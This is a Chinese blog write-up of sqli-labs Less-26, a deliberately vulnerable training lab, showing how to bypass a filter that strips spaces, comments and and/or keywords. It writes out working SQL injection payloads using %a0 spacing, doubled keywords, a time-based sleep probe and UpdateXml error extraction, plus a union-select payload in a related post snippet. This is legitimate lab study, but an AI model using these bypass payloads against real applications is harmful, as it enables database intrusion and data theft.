【sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基於錯誤的去除了空格和註釋的註入)

阿新 • • 發佈：2018-01-28

src blog sci 字符 XML 包含 col concat image

技術分享圖片

看了下源碼

所有的註釋形式和反斜線，and，or都被了過濾掉了

技術分享圖片

單引號沒有過濾

空格也被過濾了

http://localhost/sqli-labs-master/Less-26/?id=1‘

技術分享圖片

http://localhost/sqli-labs-master/Less-26/?id=1‘ ‘

技術分享圖片

看了網上的一些方法都是使用了%a0替換掉了空格

http://localhost/sqli-labs-master/Less-26/?id=1‘%a0oorr%a0‘1‘=‘1

但是出了一點問題，似乎無法識別%a0這個字符，有人說是window環境下apache的問題

技術分享圖片

可以先放著，因為這個語句是可以正常被執行的

http://localhost/sqli-labs-master/Less-26/?id=1‘oorr‘1‘=‘1

SELECT * FROM users WHERE id=‘1‘or‘1‘=‘1‘ LIMIT 0,1

技術分享圖片

利用這一點，可以構造這樣的註入

id參數的值不包含註釋不包含空格，卻可以在正常執行，當user()的第一個字符為‘r‘的時候，延時1s

http://localhost/sqli-labs-master/Less-26/?id=1‘%26%26sleep(ascii(mid(user(),1,1))=114)%26%26‘1‘=‘1

select * from users where id=‘1‘&&sleep(ascii(mid(user(),1,1))=114)&& 
‘1‘=‘1‘ limit 0,1

技術分享圖片

當然出錯信息沒有被屏蔽也可以用UpdateXml函數直接報錯來顯示

http://localhost/sqli-labs-master/Less-26/?id=1‘%26%26UpdateXml(1,concat(0x7e,user(),0x7e),1)%26%26‘1‘=‘1

技術分享圖片

【sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基於錯誤的去除了空格和註釋的註入)

src blog sci 字符 XML 包含 col concat image 看了下源碼所有的註釋形式和反斜線，and，or都被了過濾掉了單引號沒有過濾空格也被過濾了 http://localhost/sqli-labs-master/Less-26/?id=

【sqli-labs】 less26a GET- Blind based -All you SPACES and COMMENTS belong to us -String-single quotes-Parenthesis(GET型基於盲註的去除了空格和註釋的單引號括號註入)

.com tables ng- username spa str ase space pan 這個和less26差不多，空格還是用%a0代替，26過了這個也就簡單了 ;%00 可以代替註釋，嘗試一下 order by 3 http://192.168.136.128/s

【sqli-labs】 less28a GET- Blind based -All you Union&Select Belong to us -String -Single quote-parenthesis(GET型基於盲註的去除了Union和Select的單引號帶括號字符型註入)

-s blog you .com 字符 mage 分享 pan col 和less28沒什麽區別，直接上個payload吧 http://192.168.136.128/sqli-labs-master/Less-28a/?id=0‘)%a0uNion%a0sElect

【sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基於錯誤的去除了空格和註釋的註入)

【sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基於錯誤的去除了空格和註釋的註入)

【sqli-labs】 less26a GET- Blind based -All you SPACES and COMMENTS belong to us -String-single quotes-Parenthesis(GET型基於盲註的去除了空格和註釋的單引號括號註入)

【sqli-labs】 less28a GET- Blind based -All you Union&Select Belong to us -String -Single quote-parenthesis(GET型基於盲註的去除了Union和Select的單引號帶括號字符型註入)

【sqli-labs】 less11 POST - Error Based - Single quotes- String (基於錯誤的POST單引號字符型註入)

【sqli-labs】 less12 POST - Error Based - Double quotes- String-with twist (基於錯誤的雙引號POST型字符型變形的註入)

【sqli-labs】 less43 POST -Error based -String -Stacked with tiwst(POST型基於錯誤的堆疊變形字符型註入)

【sqli-labs】 less2 GET - Error based - Intiger based (基於錯誤的GET整型註入)

【sqli-labs】 less46 GET -Error based -Numeric -Order By Clause(GET型基於錯誤的數字型Order By從句註入)

【sqli-labs】 less10 GET - Blind - Time based. - Double quotes (基於時間的雙引號盲註)

【sqli-labs】 less9 GET - Blind - Time based. - Single Quotes (基於時間的GET單引號盲註)

【sqli-labs】 less19 POST - Header Injection - Referer field - Error based (基於頭部的Referer POST報錯註入)

【sqli-labs】 less21 Cookie Injection- Error Based- complex - string ( 基於錯誤的復雜的字符型Cookie註入)

【sqli-labs】 less40 GET -Blind based -String -Stacked(GET型基於盲註的堆疊查詢字符型註入)

【sqli-labs】 less41 GET -Blind based -Intiger -Stacked(GET型基於盲註的堆疊查詢整型註入)

【sqli-labs】 less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型轉義了'/"字符的寬字節註入)

【sqli-labs】 less33 GET- Bypass AddSlashes (GET型繞過addslashes() 函數的寬字節註入)

【sqli-labs】 less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型挑戰聯合查詢只允許10次查詢變化1)

【sqli-labs】 less58 GET -Challenge -Double Query -5 queries allowed -Variation1 (GET型挑戰雙查詢只允許5次查詢變化1)

【sqli-labs】 less64 GET -Challenge -Blind -130 queries allowed -Variation3 (GET型挑戰盲註只允許130次查詢變化3)

【sqli-labs】 less65 GET -Challenge -Blind -130 queries allowed -Variation4 (GET型挑戰盲註只允許130次查詢變化4)

【sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基於錯誤的去除了空格和註釋的註入)

相關推薦